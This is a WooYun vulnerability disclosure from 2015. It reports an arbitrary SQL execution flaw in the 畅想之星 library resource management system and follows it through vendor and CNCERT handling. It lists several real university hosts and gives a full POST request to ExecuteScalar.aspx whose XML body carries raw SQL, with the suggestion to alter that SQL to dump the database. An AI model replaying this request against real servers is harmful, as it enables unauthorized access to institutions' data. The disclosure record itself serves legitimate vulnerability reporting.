当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103953

漏洞标题:畅想之星非书资源管理系统任意sql语句执行漏洞

相关厂商:IDL-EDT30

漏洞作者: 路人甲

提交时间:2015-03-26 18:12

修复时间:2015-06-29 11:12

公开时间:2015-06-29 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向第三方安全合作伙伴开放
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

比较奇葩的直接之星sql语句的漏洞

详细说明:

我觉得这个东西很有趣!
影响各大学校啊:

http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
http://202.112.181.252/emlib4/format/release/aspx/eml_homepage.aspx
http://202.202.12.32/emlib4/format/release/aspx/eml_homepage.aspx
http://202.120.143.35/emlib4/format/release/aspx/eml_homepage.aspx
http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_homepage.aspx


POST /emlib4/system/datasource/ExecuteScalar.aspx
这里可以执行任意语句

漏洞证明:

以清华大学的来证明,打开页面随便点击一个页面抓取数据包:

http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx


01.jpg


POST /emlib4/system/datasource/ExecuteScalar.aspx HTTP/1.1
Host: 166.111.120.118
Proxy-Connection: keep-alive
Content-Length: 189
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.2
Origin: http://166.111.120.118
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Content-type: text/xml; charset=UTF-8
Referer: http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx?RUID=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=s3yowmvvxjgyz055mlggyn45; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30
<Root><A3020>system</A3020><A3001><![CDATA[SELECT B.RUID FROM S_MD4 A INNER JOIN S_MD4_TYPE B ON A.MDCODE=B.TYPECODE AND B.TABLERUID='-1' WHERE A.RUID='172d6b4800006000ea']]></A3001></Root>


修改一下,直接查库啊!!

02.jpg


03.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-31 11:11

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无